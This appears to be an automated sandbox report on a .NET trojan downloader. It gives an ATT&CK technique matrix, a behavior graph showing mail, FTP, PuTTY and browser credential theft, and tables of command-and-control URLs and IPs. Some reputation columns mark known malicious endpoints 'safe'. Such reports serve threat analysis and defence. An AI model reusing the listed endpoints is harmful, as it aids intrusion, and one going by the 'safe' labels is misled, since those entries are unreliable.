                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Access Token Manipulation1NTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobTimestomp1Proc FilesystemSystem Information Discovery13Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 368924 Sample: SecuriteInfo.com.Trojan.Dow... Startdate: 15/03/2021 Architecture: WINDOWS Score: 100 29 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->29 31 Found malware configuration 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 6 other signatures 2->35 7 SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe 15 8 2->7         started        process3 dnsIp4 23 liverpooldabestteamoftheworld.com 172.67.197.219, 443, 49691, 49692 CLOUDFLARENETUS United States 7->23 25 192.168.2.1 unknown unknown 7->25 37 Tries to steal Mail credentials (via file registry) 7->37 39 Hides threads from debuggers 7->39 41 Injects a PE file into a foreign processes 7->41 43 Contains functionality to hide a thread from the debugger 7->43 11 SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe 54 7->11         started        15 cmd.exe 1 7->15         started        17 WerFault.exe 20 9 7->17         started        signatures5 process6 dnsIp7 27 87.251.79.157, 49696, 49697, 49698 RISS-ASRU Russian Federation 11->27 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 51 Tries to harvest and steal browser information (history, passwords, etc) 11->51 19 conhost.exe 15->19         started        21 timeout.exe 1 15->21         started        signatures8 process9

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe43%VirustotalBrowse
                SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe17%ReversingLabsByteCode-MSIL.Backdoor.Androm
                SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack100%AviraHEUR/AGEN.1100849Download File

                Domains

                SourceDetectionScannerLabelLink
                liverpooldabestteamoftheworld.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-199546160%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://www.liverpool.com/schedule/0%Avira URL Cloudsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                https://s2-prod.liverpool.com/0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-12313538370%Avira URL Cloudsafe
                https://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%Avira URL Cloudsafe
                http://liverpooldabestteamoftheworld.com0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-020%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-199460%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-19938360%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/premier-league0%Avira URL Cloudsafe
                http://87.251.79.157/m0ha/0/pin.phpP0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/andrew-robertson0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%Avira URL Cloudsafe
                http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-1995900%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/transfers0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%Avira URL Cloudsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-0%Avira URL Cloudsafe
                https://liverpooldabestteamoftheworld.com40%Avira URL Cloudsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                https://reach-id.orbit.tm-awx.com/analytics.js.gz0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%Avira URL Cloudsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-12313538370%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-199410530%Avira URL Cloudsafe
                https://felix.data.tm-awx.com/felix.min.js0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/ozan-kabak0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/sadio-mane0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/curtis-jones0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.0%Avira URL Cloudsafe
                http://87.251.79.157/m0ha/0/pin.php0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                liverpooldabestteamoftheworld.com
                		172.67.197.219
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.htmlfalse
                • Avira URL Cloud: safe
                		unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://87.251.79.157/m0ha/0/pin.phptrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                  		high
                  https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.liverpool.com/schedule/SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                    		high
                    http://www.ibsensoftware.com/SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://s2-prod.liverpool.com/SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-futureSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                      		high
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://liverpooldabestteamoftheworld.comSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                        		high
                        https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                          		high
                          https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                              		high
                              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.liverpool.com/all-about/premier-leagueSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://87.251.79.157/m0ha/0/pin.phpPSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.liverpool.com/liverpool-fc-news/SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                		high
                                https://www.liverpool.com/all-about/andrew-robertsonSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                  		high
                                  https://www.liverpool.com/all-about/transfersSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                    		high
                                    http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://liverpooldabestteamoftheworld.com4SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://reach-id.orbit.tm-awx.com/analytics.js.gzSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                        		high
                                        https://static.hotjar.com/c/hotjar-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                          		high
                                          https://www.liverpool.com/liverpool-fc-news/features/SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                            		high
                                            https://felix.data.tm-awx.com/felix.min.jsSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpgSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/ozan-kabakSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/sadio-maneSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.liverpool.com/all-about/curtis-jonesSecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpfalse
                                              		high
                                              https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299231317.000000000315A000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
